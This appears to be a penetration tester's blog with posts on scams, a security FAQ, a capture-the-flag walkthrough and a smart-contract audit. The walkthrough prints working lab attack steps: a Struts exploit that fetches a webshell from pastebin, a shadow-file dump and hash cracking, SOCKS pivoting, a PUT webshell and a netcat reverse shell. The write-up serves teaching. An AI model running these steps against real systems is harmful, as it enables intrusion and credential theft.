C0:7E:01:8C:93:EB:D0:FD:E3:CD:74:32:9F:AF:FA:6F:40:FD:8E:1C:05:E3:79:41:6C:77:CD:EF:3E:04:11:12

Saturday, December 27, 2025

Scams and Social Engineering Attacks

What are scams?

Scams are a form of social engineering attack technique designed to manipulate a victim into performing an arbitrary action for illicit profit. Techniques can be carried out via coercion, threat, manipulation or trickery.

Why are people prone to social engineering?

It's commonly due to human psychology - eg. desire, greed, fear or gullibility. It is only natural to exhibit these traits, after all, it is what makes us humans. It is not surprising that even highly educated professional such as doctors, accountants, IT executives, lawyers are susceptible to social engineering attacks. A lonely woman or man are easy prey for love scams, a profit minded person is easy target for investment scams. A career minded person or desperate job seeker is easy prey for job scams, tech illiterate retirees get scammed by fake tech support or law enforcement agencies into transferring monies into attacker bank accounts. While scams are usually profit driven, social engineering also serve as a means to infiltrate or circumvent enterprise security controls. Both scams and social engineering attacks can be performed physically or logically. Physical attacks involve face-to-face impersonation at the victim's premise while logical attacks can be done remotely via emails, voice calls or Phishing websites.

What other scenarios are Social Engineering design for?

It is often said that the weakest link in computer security is the user. While highly skilled hackers usually find software flaws in widely used applications, it doesn't always have to be that difficult to pull of a heist. In red teaming exercise (an end-to-end security assessment of an organization's resiliency agaisnt cyber attacks), social engineering is by far the most common attack path to gain initial access into corporate networks. For eg, red teamers impersonate HR by sending mandatory 'on-boarding' exercise emails to new employees of a Pharmaceutical company from emails scraped off LinkedIn. These emails contain dropper links to download malicious software with sophisticated malware that are able to evade end-point-protection systems. Once executed, the malware will call back home, allowing the attacker to remotely control the victim's host to perform further arbitrary actions without consent or knowledge of the victim.

The ultimate goal of an attacker is to gain access to sensitive information vaults and exfiltrate data out of the organization's network perimeter without detection, some attackers deliberately encrypt critical systems using ransomware and demand payment in crypto currencies to unlock it.

How to protect against social engineering & scam attacks?

Constantly educate and remind people the dangers of trusting anything they see, read or receive on the Internet. The advancement in AI allows anyone to easily manipulate text, voice, video and images. Always question the authenticity of anything they receive, read, hear, see or download. The Web is a complex global public network of millions of interconnected computers notoriously known as the wild-wild-west, so always tread with caution. As a general rule, do not click, download, install untrusted software or links or pick up unknown voice or video calls. Do not voluntarily give out your personal information such as your full name, DoB, residential address, social security no, bank account details, etc. This includes websites or anyone that might ask you for private details. The more an attacker knows about you or your organization, the easier it will be for them to design an elaborate scheme to eventually trick, coerce or deceive you. While there are countless of logical controls built around users to prevent security breaches, not every action can be solved by installing software alone. Softwares are as good as the user using it. User education and awareness are vital in protecting against security breaches.

Friday, August 4, 2023

Average Joe Cyber Security Top FAQ

It's been a long while since I've updated my blog. Ever since I became a full time pen-tester, I've been approached by multiple contacts, both random and acquittances for the following:

1. Can you hack into this other person's WhatsApp, FB, Social Media, Website, etc? Followed by very long story of why this is necessary. i.e. jilted lover, cheating spouses, long lost contact, asking for a friend, etc etc.

2. Would you like to work for some xxx regime to provide training or hacking services?

3. Someone sent me an email to claim to have taken compromising pictures/videos of me after I browsed some porn website, he says he has my private info and threatens to publish it to all my social media contacts, he is now asking for ransom in bitcoin. What do I do?

4. Can I get hacked by browsing porn websites?

5. How do I know if someone is spying on my device?

6. Is it safe to use FB, WhatsApp, Gmail or other social media products/services?

7. Is Mac more secure than Windows, is iOS more secure than Android?

8. Where can I learn more about online security?

9. Can I become a hacker??

10. Should I buy a commercial Anti Virus for my pc and phone?

Answers:

1. No, why not? Because it is illegal.

2. No, why not? Because I don't want to get caught up with someone's else war or conflict or politics. Security testing is a professional service to identify vulnerabilities for organizations to proactively secure their systems and not to serve someone's illicit gain for profit or political cause.

3. Firstly, do a simple google search on the content of his email, very likely you will find it is a scam. Always take precaution when uploading/posting private info online to avoid it falling into the wrong hands. Better still do not voluntary give out your personal info such as DoB, residential Addr, Age, Sex, etc to any website that asks for it. If you have never voluntary exposed sensitive info/pictures of yourself, you have nothing to worry about. Remember, your private data is only as secure as the org that it resides on.

4. Not just porn websites, any sites that is loaded with the right browser exploit can compromise/execute code on your machine if your browser is not properly patched, this is often called 0-click exploit. The good news is that client side browser exploits (0day exploits) are hard to come by and are usually sold and used by selected nation state actors or campaigns. It is rarely used to hack the average joe unless you are on some watch/wanted list. Even if your browser is properly patched, you can still accidentally execute code when/if you unknowingly/knowingly downloaded and/or clicked on some executable binary or link from some dodgy website. Almost all well known web browsers now days have built-in security to warn and prevent users from unknowingly executing malicious code. I would be more concern about simple online security practices, i.e - always keep your device and web browser updated with the latest security patches, don't click on unknown links and don't voluntary give out private data, use 2-factor auth for your important web accounts & don't install apps that you are unsure of where it came from; that would keep you 99% of harms way.

5. This is often a difficult question to answer, it is dependent on why you are asking that question, did you notice something unusual about your device? is it slower than normal, does my webcam suddenly activate w/o user interaction, are you getting weird messages/pop ups on your device? Unless your device is thoroughly examined by a IT forensics expert, it is difficult to ascertain if your device was compromised. Best course of action is to reinstall the device's operating system or factory resetting it completely.

6. The word safe is dependent on what & how you define as safe? Social media is a double edged sword. It is useful but can be abused. If you are paranoid about privacy, don't use it at all. The service is free because it collects private info about you and is used for marketing/advertisement purposes, you accepted the terms and conditions when you signed up. It can be unsafe, if you shared all your private info for the world to see. This can lead to identity fraud.

7. This is subjective. Apple products are known to be more locked down to avoid users from making silly mistakes that can compromise their security. Privacy concerns are still a matter of accepting the terms and conditions of use of the product and service. While it is assumed that American and European companies are bounded by stricter privacy laws, law enforcement agencies do have access to your data when required. The word secure/safe is subjective to how you define secure. Dummy proof would be a better word to describe Apple products.

8. There are thousands of materials online, some good, some not. I would go to youtube and google and search for specific topics of interest and do your own research.

9. The term 'hacker' is a over glorified term used synonym in Hollywood movies to portray rebellious teens in their mom's basement hacking NORAD. The professional term is referred as penetration tester or security tester. Yes, I would recommend offensive security courses if you are keen.

10. it is up to you, it like wearing a raincoat incase it rains. I usually don't use AVs as I am confident of best practices but I would recommend one if you are paranoid about security.

Wednesday, March 16, 2022

YesWehack Pwnjitsu CTF 2021

Back in 2021, I was invited to participate in a CTF challenge, I don't normally do CTFs but since I was personally invited by a friend, I couldn't say No.

Here's the walkthru, nothing too difficult. 4 out of 10 for difficulty. There was about 4 hosts that participants had to fully compromise. Each host had a secret file that contained the flag. In total there were 6 flags to capture. Participants were given about 16 hours but I completed it in under 8 hours and a small bounty of Euro400 was paid to me shortly. 😍

1. The initial entry was via Apache struts RCE. I can't remember how I spotted the bug initially, perhaps I crawled it with Burp and saw that it had Apache Struts installed. Exploitation was straight forward - script kiddie style haha.

$ python ApacheStruts.py http://172.16.1.33:8080/continuum/security/login.action +] RUN EXPLOIT CVE-2013-2251 [-] NO VULNERABLE TO CVE-2013-2251 [+] RUN EXPLOIT CVE-2017-5638 [-] VULNERABLE [-] RUN THIS EXPLOIT (s/n): s [-] GET PROMPT... * [UPLOAD SHELL] Struts@Shell:$ pwnd (php) * [DOWNLOAD SHELL] wget https://pastebin.com/raw/baJmN8G8 -O /tmp/status.php Struts2@CVE-2017-5638 $ ls LICENSE NOTICE apps bin conf contexts data derby.log flag.txt lib logs tmp Struts2@CVE-2017-5638 $ id uid=0(root) gid=0(root) groups=0(root) Struts2@CVE-2017-5638 $ pwd /opt/apache_continuum/apache-continuum-1.4.2 Struts2@CVE-2017-5638 $ cat flag.txt PWNJUTSU{WmuK1PidRLYt5gUnoC6UdtWLNM659Yvb} 2. Since I got root directly from the Apache Struts RCE, the next move was to crack shadow passwd file: Struts2@CVE-2017-5638 $ cat /etc/shadow root:!:18688:0:99999:7::: daemon:*:16176:0:99999:7::: bin:*:16176:0:99999:7::: sys:*:16176:0:99999:7::: sync:*:16176:0:99999:7::: games:*:16176:0:99999:7::: man:*:16176:0:99999:7::: lp:*:16176:0:99999:7::: mail:*:16176:0:99999:7::: news:*:16176:0:99999:7::: uucp:*:16176:0:99999:7::: proxy:*:16176:0:99999:7::: www-data:*:16176:0:99999:7::: backup:*:16176:0:99999:7::: list:*:16176:0:99999:7::: irc:*:16176:0:99999:7::: gnats:*:16176:0:99999:7::: nobody:*:16176:0:99999:7::: libuuid:!:16176:0:99999:7::: syslog:*:16176:0:99999:7::: messagebus:*:18688:0:99999:7::: sshd:*:18688:0:99999:7::: statd:*:18688:0:99999:7::: vagrant:$6$/Z97giSD$w1G/dmR09EnAh5hY47o/Hmb7ExAFHWwqfwsL1lvhpP41jDdP07ij4S3.RM/ZLBHX06Wm5QJ0Tx2/m3TJo.o5E0:18688:0:99999:7::: dirmngr:*:18688:0:99999:7::: han_solo:$1$6jIF3qTC$7jEXfQsNENuWYeO6cK7m1.:18688:0:99999:7::: lando_calrissian:$1$Af1ek3xT$nKc8jkJ30gMQWeW/6.ono0:18688:0:99999:7::: boba_fett:$1$TjxlmV4j$k/rG1vb4.pj.z0yFWJ.ZD0:18688:0:99999:7::: chewbacca:$1$.qt4t8zH$RdKbdafuqc7rYiDXSoQCI.:18688:0:99999:7::: mysql:!:18688:0:99999:7::: splunk:!:18688:0:99999:7::: - Just like anyone else, I feed the hash into john to crack :-) It didn't take too long to crack it, passwd was very simple. $ john pass.txt Warning: only loading hashes of type "sha512crypt", but also saw type "md5crypt" Use the "--format=md5crypt" option to force loading hashes of that type instead Warning: only loading hashes of type "sha512crypt", but also saw type "md5crypt-long" Use the "--format=md5crypt-long" option to force loading hashes of that type instead Using default input encoding: UTF-8 Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x]) Cost 1 (iteration count) is 5000 for all loaded hashes Will run 8 OpenMP threads Proceeding with single, rules:Single Press 'q' or Ctrl-C to abort, almost any other key for status vagrant (vagrant) 1g 0:00:00:00 DONE 1/3 (2021-06-01 22:02) 25.00g/s 800.0p/s 800.0c/s 800.0C/s vagrant..Vagrant12 Use the "--show" option to display all of the cracked passwords reliably Session completed - Used the cracked passwd to ssh to another victim host: $ ssh 172.16.1.33 -l vagrant vagrant@172.16.1.33's password: Last login: Wed May 5 21:21:19 2021 vagrant@n33-vm1:~$ id uid=900(vagrant) gid=900(vagrant) groups=900(vagrant),27(sudo) vagrant@n33-vm1:~$ - get the 2nd flag :-) vagrant@n33-vm1:~$ cat flag.txt PWNJUTSU{7QLtE5Aao737TVWyc7FvyA7CWLRny9Mq} vagrant@n33-vm1:~$ 3. Now, time to Priv escalate to w0000t, a quick sudo su - did the job! vagrant@n33-vm1:/home$ ifconfig eth0 Link encap:Ethernet HWaddr 00:0c:29:cf:43:2c inet addr:10.33.1.1 Bcast:10.33.1.255 Mask:255.255.255.0 inet6 addr: fe80::20c:29ff:fecf:432c/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:789997 errors:0 dropped:0 overruns:0 frame:0 TX packets:923201 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:91918138 (91.9 MB) TX bytes:467250606 (467.2 MB) lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:570349 errors:0 dropped:0 overruns:0 frame:0 TX packets:570349 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:35506673 (35.5 MB) TX bytes:35506673 (35.5 MB) vagrant@n33-vm1:/home$ sudo su - root@n33-vm1:~# id uid=0(root) gid=0(root) groups=0(root) root@n33-vm1:~# - get the next flag: root@n33-vm1:~# pwd /root root@n33-vm1:~# ls flag.txt root@n33-vm1:~# cat flag.txt PWNJUTSU{jnmTumzqX4uMh9SIASsHNkv2j9KVD1u6} root@n33-vm1:~# - and another flag: oot@n33-vm1:/home/boba_fett# cat flag.txt PWNJUTSU{2uUyMnSIPNfvBYf1bUDJFrf8stkgkklV} - another flag: root@n33-vm1:/home/han_solo# cat flag.txt PWNJUTSU{wmyCXCEuXa3K2GckUzarcpQSf5Zudv58} root@n33-vm1:/home/han_solo# 4. Pivot to another victim host: - on vm1, I nmap the net to see what was around me: root@n33-vm1:/home/boba_fett# nmap 10.33.1.0/24 -n Starting Nmap 6.40 ( http://nmap.org ) at 2021-06-01 14:10 UTC Nmap scan report for 10.33.1.2 Host is up (0.00026s latency). Not shown: 986 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 81/tcp open hosts2-ns 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3389/tcp open ms-wbt-server 8009/tcp open ajp13 8080/tcp open http-proxy 9200/tcp open wap-wsp 49152/tcp open unknown 49153/tcp open unknown 49154/tcp open unknown 49155/tcp open unknown MAC Address: 00:0C:29:64:87:FC (VMware) Nmap scan report for 10.33.1.3 Host is up (0.00023s latency). All 1000 scanned ports on 10.33.1.3 are filtered MAC Address: 00:0C:29:F8:F3:74 (VMware) Nmap scan report for 10.33.1.254 Host is up (-0.100s latency). All 1000 scanned ports on 10.33.1.254 are filtered MAC Address: 00:0C:29:FC:A6:7C (VMware) Nmap scan report for 10.33.1.1 Host is up (0.000010s latency). Not shown: 994 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 111/tcp open rpcbind 3306/tcp open mysql 6667/tcp open irc 8080/tcp open http-proxy Nmap done: 256 IP addresses (4 hosts up) scanned in 205.90 seconds - I needed to access the 10.33 network from my attacker host on 172.16.1.33. So I setup a SOCKS to 10.33.1.1 to bridge the 2 hosts: $ ssh -D 1337 -q -C -N vagrant@172.16.1.33 vagrant@172.16.1.33's password: - Now I can point my browser to use localhost socks on 1337/tcp and I can access 10.33.1.2 web services:





- phpinfo() indicates that the next victim host is a windows box:






5. I found that it supported HTTP PUT. Simple enough, just upload my shell and I should get RCE on 10.33.1.2.

- Create one-liner webshell using PUT





- Obtain RCE using webshell





- To see what's in the webserver, I did a dir listing using 'dir':





- obtain the flag:




6. I needed a better connection to this host, so I decided the create a rev shell. Like all good script kiddies, I uploaded windows rev shell to 10.33.1.2 using the same PUT method:




- Caught the rev shell with netcat:


vagrant@n33-vm1:~$ nc -nlvp 1234
Listening on [0.0.0.0] (family 0, port 1234)
Connection from [10.33.1.2] port 1234 [tcp/*] accepted (family 2, sport 49243)
b374k shell : connected

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\wamp\www\uploads\test>whoami
whoami
nt authority\local service

C:\wamp\www\uploads\test>

- obtain password_flag.txt

 lando_calrissian 's accounts

==============================

Administrator / @dm1n1str8r

lando_calrissian / @dm1n1str8r

- remove the spaces:

PWNJUTSU{bAsLAANvrsFauBXKoPeuhWAfZyP3DnJk}


- ssh to 10.33.1.2

vagrant@n33-vm1:~$ ssh -l lando_calrissian 10.33.1.2
lando_calrissian@10.33.1.2's password: 
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\Administrator\Documents\files>whoami
whoami
nt authority\local service

- get the flag:

C:\Program Files\OpenSSH\home\lando_calrissian>dir
 Volume in drive C is Windows 2008R2
 Volume Serial Number is 64C4-FFBE

 Directory of C:\Program Files\OpenSSH\home\lando_calrissian

04/18/2021  01:49 PM    <DIR>          .
04/18/2021  01:49 PM    <DIR>          ..
05/26/2021  08:57 PM                90 flag.txt
               1 File(s)             90 bytes
               2 Dir(s)  44,618,330,112 bytes free

C:\Program Files\OpenSSH\home\lando_calrissian>more flag.txt
PWNJUTSU{jmdFwrr6KZNis6y2U9VhZz62IRHplCG5}

7. Now pivot to another host - 10.33.1.3. Same thing, create socks on 10.33.1.2

vagrant@n33-vm1:~$ ssh -D 1337 -q -C -N  -l lando_calrissian 10.33.1.2

- on 10.33.1.2 I did another nmap to see what's around me: 

vagrant@n33-vm1:~$ sudo nmap --proxy socks4://127.0.0.1:1337 10.33.1.3 -n -sN


- Another method is to create socks from 10.33.1.1 to 10.33.1.2:

vagrant@n33-vm1:~$ ssh -D 1337 -q -C -N  -l lando_calrissian 10.33.1.2
lando_calrissian@10.33.1.2's password: 


- on 10.33.1.1 I did a port fwd:

$ ssh -L 8081:localhost:1337 vagrant@172.16.1.33
vagrant@172.16.1.33's password: 

- then edit proxychain.conf:

 socks4 127.0.0.1 8081

- then proxychains nmap 10.33.1.3 or dirb 10.33.1.3 for burp point socks to 127.0.0.1:8081 then browse to 10.33.1.3

$ proxychains nmap 10.33.1.3 -n
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.80 ( https://nmap.org ) at 2021-06-03 22:03 +08
|S-chain|-<>-127.0.0.1:8081-<><>-10.33.1.3:80-<><>-OK
|S-chain|-<>-127.0.0.1:8081-<><>-10.33.1.3:8888-<--timeout
|S-chain|-<>-127.0.0.1:8081-<><>-10.33.1.3:23-<--timeout
|S-chain|-<>-127.0.0.1:8081-<><>-10.33.1.3:135-<--timeout
|S-chain|-<>-127.0.0.1:8081-<><>-10.33.1.3:111-<--timeout
|S-chain|-<>-127.0.0.1:8081-<><>-10.33.1.3:53-<--timeout
|S-chain|-<>-127.0.0.1:8081-<><>-10.33.1.3:1025-<--timeout
|S-chain|-<>-127.0.0.1:8081-<><>-10.33.1.3:993-<--timeout
|S-chain|-<>-127.0.0.1:8081-<><>-10.33.1.3:256-<--timeout
|S-chain|-<>-127.0.0.1:8081-<><>-10.33.1.3:3389-<--timeout
|S-chain|-<>-127.0.0.1:8081-<><>-10.33.1.3:554-<--timeout
|S-chain|-<>-127.0.0.1:8081-<><>-10.33.1.3:443-<--timeout
|S-chain|-<>-127.0.0.1:8081-<><>-10.33.1.3:3306-<--timeout
|S-chain|-<>-127.0.0.1:8081-<><>-10.33.1.3:80-<><>-OK
|S-chain|-<>-127.0.0.1:8081-<><>-10.33.1.3:5900-<><>-OK
|S-chain|-<>-127.0.0.1:8081-<><>-10.33.1.3:110-<--timeout


8. Obtain Flag on 10.33.1.3:

- vnc to it passwd is password

$proxychains xtightvncviewer 10.33.1.3 -compresslevel 9 -quality 4 -depth 8

ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:8081-<><>-10.33.1.3:5900-<><>-OK
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
Performing standard VNC authentication
Password: 
Authentication successful
Desktop name "captain's X desktop (n33-vm3:1)"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding

flag screenshot: 10.33.3-vnc.png





- there is also a drupal webpage on 10.33.1.3 but easier to ssh to it:
 passwd is captain

$ proxychains ssh 10.33.1.3 -l captain
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:8081-<><>-10.33.1.3:22-<><>-OK
The authenticity of host '10.33.1.3 (10.33.1.3)' can't be established.
ECDSA key fingerprint is SHA256:hvwDN/6vV9Q/eULn6TD3ZJ9Cljn2cwy25/Sk0DOFnXc.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.33.1.3' (ECDSA) to the list of known hosts.
captain@10.33.1.3's password: 
captain@n33-vm3:~$ id
uid=1002(captain) gid=1002(captain) groups=1002(captain)
captain@n33-vm3:~$ 

9. priv esc on 10.33.1.3:

- read the history file for user captain to find a passwd hash:

captain@n33-vm3:~$ history 
    1  ls -la 
    2  ps -ef
    3  netstat -nao
    4  cd
    5  mkdir -p .vnc
    6  vncserver 
    7  vncserver -kill :1
    8  ifconfig
    9  ip a
   10  ls -la
   11  cd /tmp
   12  rm tempfile
   13  cd
   14  su
   15  su
   16  su
   17  sudo --help
   18  su
   19  root
   20  su root
   21  root
   22  su root root
   23  sudo -iS root
   24  cat /etc/passwd
   25  echo root | sudo passwd
   26  apt update
   27  apt install sl
   28  apt upgrade
   29  apt install python3-pip
   30  echo root:$6$tIOfiXdyfe7nDTP0$QJjeL9ktKC0qrE.Ma0etiyVcJggaInuAkn7V1ruENQg3BeQ5sWhEORVzT2HBYmxoHSk3cdZNf53YcgUakUBEH.:18619:0:99999:7::: >> /etc/shadow
   31  htop
   32  top
   33  rm -rf /data/yolo

- use john to crack the root passwd:

$john shadow.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
root             (root)
1g 0:00:00:00 DONE 1/3 (2021-06-03 22:36) 25.00g/s 800.0p/s 800.0c/s 800.0C/s root..Root12
Use the "--show" option to display all of the cracked passwords reliably
Session completed

- su to root passwd is root:

captain@n33-vm3:~$ su - root
Password: 
root@n33-vm3:~# cd /root
root@n33-vm3:~# ls -al
total 120
drwx------ 17 root root 4096 May 26 20:48 .
drwxr-xr-x 20 root root 4096 Dec 22 12:21 ..
-rw-------  1 root root 9826 May 25 14:19 .bash_history
-rw-r--r--  1 root root 3106 Dec  5  2019 .bashrc
drwx------  6 root root 4096 May 25 14:10 .cache
drwx------ 11 root root 4096 May 25 14:11 .config
drwxr-xr-x  2 root root 4096 May 25 14:10 Desktop
drwxr-xr-x  2 root root 4096 Dec 23 14:46 Documents
drwxr-xr-x  2 root root 4096 Mar 26 15:21 Downloads
-r--------  1 root root   49 May 26 20:48 final_flag.txt
drwx------  3 root root 4096 May 25 14:10 .gnupg
-rw-------  1 root root   36 May  8 09:06 .lesshst
drwxr-xr-x  3 root root 4096 May 25 14:10 .local
drwxr-xr-x  2 root root 4096 May 25 14:10 Music
drwxr-xr-x  2 root root 4096 Dec 23 09:25 Pictures
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
drwxr-xr-x  2 root root 4096 May 25 14:10 Public
-rw-r--r--  1 root root   75 Apr 13 08:22 .selected_editor
drwxr-xr-x  3 root root 4096 Dec 22 12:28 snap
drwx------  2 root root 4096 Apr 20 16:11 .ssh
drwxr-xr-x  2 root root 4096 May 25 14:10 Templates
drwxr-xr-x  2 root root 4096 May 25 14:10 Videos
drwxr-xr-x  2 root root 4096 Apr 16 16:15 .vim
-rw-------  1 root root 9359 May 25 21:10 .viminfo
-rw-------  1 root root   51 May 25 14:18 .Xauthority
-rw-------  1 root root 2281 May 25 14:18 .xsession-errors
root@n33-vm3:~# cat final_flag.txt 
FINAL_PWNJUTSU{42tBxe6uasbxPLhJWS9gV7nPYvyycGtQ}
root@n33-vm3:~#

10. Game over!

Sunday, February 20, 2022

Static Analysis of Smart Contract

Tasks

The assessment objectives and respective statuses are summarized in the following table:

Objective	Status
Audit any issues with Roles or Privileges within the contract and what the impact may be for any vulnerabilities due to privileges.	Objective met - suicide vulnerabilies identified pertaining to improper access control
Static Analysis issues	Objective met - ran slither on all contracts, identified over 14 vulnerabilities.
Compile and Deploy the contract set to a Local instance like Ganache to perform testing on the contract set. In particular the "Private-Sale.sol" contract may have some issues with protecting tokens. Show how it can be exploited.	Objective met - Reentry exploit code produced and deployed to Ganache environment.
Any other dynamic findings like fuzzing or formal verification and symbolic execution.	Objective not met - Did not perform dynamic testing using MithX due to commercial license required.

Summarized Findings

The following SmartContracts were subjected to static analysis using slither for common vulnerabilities:

Private-Sale.sol,
Halborn-Pool.sol,
MyTokens.sol

The vulnerabilities identified with business impact are:

Reentry (sev: high) - 3 instances found,
State-variable-shadowing (high),
Suicidal (sev: high) - 2 instances found,
Unchecked-transfer (sev: high),
Contract locking (sev: Med)

Note, all vulnerabilities with the impact of High & Medium are highlighted in yellow in the evidence section below.

There were 2 instances found of improper access control or rather known as a “suicide” vulnerability in MyToken.sol &

HalbornPool.sol respectively, it meant that a malicious attacker could self-destruct the contract. These vulnerabilities are

categorized as SWC-106 at https://swcregistry.io/docs/SWC-106

The following vulnerabilities with informational severity are:

Low level calls
Different Pragma Directives were used
Conformance to Solidity naming conventions
Dead Code
Unused State Variable
State Variable that Could be declared constant
Different pragma in used
Dead-Code
Incorrect versions of Solidity

A Proof of Concept (PoC) exploit was produced for Private-Sales.sol to drain the Bank of all Ether by exploiting a Reentry

vulnerability in lines 35-47. The PoC was built in remix and connected to the Ganache environment. The full Reentry exploit code (attacker.sol)

was also added to this report. It was noted that the following SmartContracts did not return any issues during analysis:

Migrations.sol,
HalbornInterface.sol

Evidences

Static Analysis: Private-Sale.sol

$ slither Private-Sale.sol

Reentrancy in PrivateSale.getRefund(uint256) (Private-Sale.sol#35-47):

External calls:

- (refunded) = msg.sender.call{value: quantity * TICKET}() (Private-Sale.sol#41)

State variables written after the call(s):

- purchasedTickets[msg.sender] -= quantity (Private-Sale.sol#45)

Reference: https://github.com/crytic/slither/wiki/Detector-Documentation#reentrancy-vulnerabilities

solc-0.8.10 is not recommended for deployment

Reference: https://github.com/crytic/slither/wiki/Detector-Documentation#incorrect-versions-of-solidity

Low level call in PrivateSale.getRefund(uint256) (Private-Sale.sol#35-47):

- (refunded) = msg.sender.call{value: quantity * TICKET}() (Private-Sale.sol#41)

Reference: https://github.com/crytic/slither/wiki/Detector-Documentation#low-level-calls

Static Analysis: HalbornPool.sol

$ slither HalbornPool.sol

Halborn._balances (MyToken.sol#12) shadows:

- ERC20._balances (openzeppelin/contracts/token/ERC20/ERC20.sol#36)

Reference: https://github.com/crytic/slither/wiki/Detector-Documentation#state-variable-shadowing

Halborn.EmergencyDestroy(address) (MyToken.sol#30-33) allows anyone to destruct the contract

Reference: https://github.com/crytic/slither/wiki/Detector-Documentation#suicidal

DefiPool.deposit(uint256,address) (HalbornPool.sol#82-94) ignores return value by HAL.transferFrom(_sender,address(this),_amount) (HalbornPool.sol#87)

DefiPool.withdraw(address) (HalbornPool.sol#100-119) ignores return value by HAL.transfer(_user,userBalance[_user]) (HalbornPool.sol#117)

Reference: https://github.com/crytic/slither/wiki/Detector-Documentation#unchecked-transfer

Contract locking ether found:

Contract DefiPool (HalbornPool.sol#20-134) has payable functions:

- HalbornInterface.deposit(uint256,address) (HalbornInterface.sol#6-7)

- HalbornInterface.withdraw(address) (HalbornInterface.sol#9-10)

- DefiPool.deposit(uint256,address) (HalbornPool.sol#82-94)

- DefiPool.withdraw(address) (HalbornPool.sol#100-119)

But does not have a function to withdraw the ether

Reference: https://github.com/crytic/slither/wiki/Detector-Documentation#contracts-that-lock-ether

Reentrancy in DefiPool.withdraw(address) (HalbornPool.sol#100-119):

External calls:

- HAL.transfer(_user,userBalance[_user]) (HalbornPool.sol#117)

State variables written after the call(s):

- userBalance[_user] = userBalance[_user] - initialUserBalance (HalbornPool.sol#118)

Reference: https://github.com/crytic/slither/wiki/Detector-Documentation#reentrancy-vulnerabilities-1

Reentrancy in DefiPool.deposit(uint256,address) (HalbornPool.sol#82-94):

External calls:

- HAL.transferFrom(_sender,address(this),_amount) (HalbornPool.sol#87)

State variables written after the call(s):

- depositStart[msg.sender] = depositStart[msg.sender] + block.timestamp (HalbornPool.sol#91)

- userBalance[_sender] = userBalance[_sender] + _amount (HalbornPool.sol#89)

Reference: https://github.com/crytic/slither/wiki/Detector-Documentation#reentrancy-vulnerabilities-2

Reentrancy in DefiPool.deposit(uint256,address) (HalbornPool.sol#82-94):

External calls:

- HAL.transferFrom(_sender,address(this),_amount) (HalbornPool.sol#87)

Event emitted after the call(s):

- Deposit(msg.sender,msg.value,block.timestamp) (HalbornPool.sol#93)

Reference: https://github.com/crytic/slither/wiki/Detector-Documentation#reentrancy-vulnerabilities-3

Different versions of Solidity is used:

- Version used: ['^0.8.0', '^0.8.2']

- ^0.8.2 (HalbornInterface.sol#2)

- ^0.8.2 (HalbornPool.sol#2)

- ^0.8.2 (MyToken.sol#2)

- ^0.8.0 (openzeppelin/contracts/access/Ownable.sol#4)

- ^0.8.0 (openzeppelin/contracts/security/Pausable.sol#4)

- ^0.8.0 (openzeppelin/contracts/token/ERC20/ERC20.sol#4)

- ^0.8.0 (openzeppelin/contracts/token/ERC20/IERC20.sol#4)

- ^0.8.0 (openzeppelin/contracts/token/ERC20/extensions/ERC20Burnable.sol#4)

- ^0.8.0 (openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol#4)

- ^0.8.0 (openzeppelin/contracts/utils/Context.sol#4)

Reference: https://github.com/crytic/slither/wiki/Detector-Documentation#different-pragma-directives-are-used

Context._msgData() (openzeppelin/contracts/utils/Context.sol#21-23) is never used and should be removed

Reference: https://github.com/crytic/slither/wiki/Detector-Documentation#dead-code

Pragma version^0.8.2 (HalbornInterface.sol#2) allows old versions

Pragma version^0.8.2 (HalbornPool.sol#2) allows old versions

Pragma version^0.8.2 (MyToken.sol#2) allows old versions

Pragma version^0.8.0 (openzeppelin/contracts/access/Ownable.sol#4) allows old versions

Pragma version^0.8.0 (openzeppelin/contracts/security/Pausable.sol#4) allows old versions

Pragma version^0.8.0 (openzeppelin/contracts/token/ERC20/ERC20.sol#4) allows old versions

Pragma version^0.8.0 (openzeppelin/contracts/token/ERC20/IERC20.sol#4) allows old versions

Pragma version^0.8.0 (openzeppelin/contracts/token/ERC20/extensions/ERC20Burnable.sol#4) allows old versions

Pragma version^0.8.0 (openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol#4) allows old versions

Pragma version^0.8.0 (openzeppelin/contracts/utils/Context.sol#4) allows old versions

solc-0.8.2 is not recommended for deployment

Reference: https://github.com/crytic/slither/wiki/Detector-Documentation#incorrect-versions-of-solidity

Parameter DefiPool.deposit(uint256,address)._amount (HalbornPool.sol#82) is not in mixedCase

Parameter DefiPool.deposit(uint256,address)._sender (HalbornPool.sol#82) is not in mixedCase

Parameter DefiPool.withdraw(address)._user (HalbornPool.sol#100) is not in mixedCase

Function DefiPool.EmergencyWithraw(address,address,uint256) (HalbornPool.sol#131-133) is not in mixedCase

Variable DefiPool.HAL (HalbornPool.sol#44) is not in mixedCase

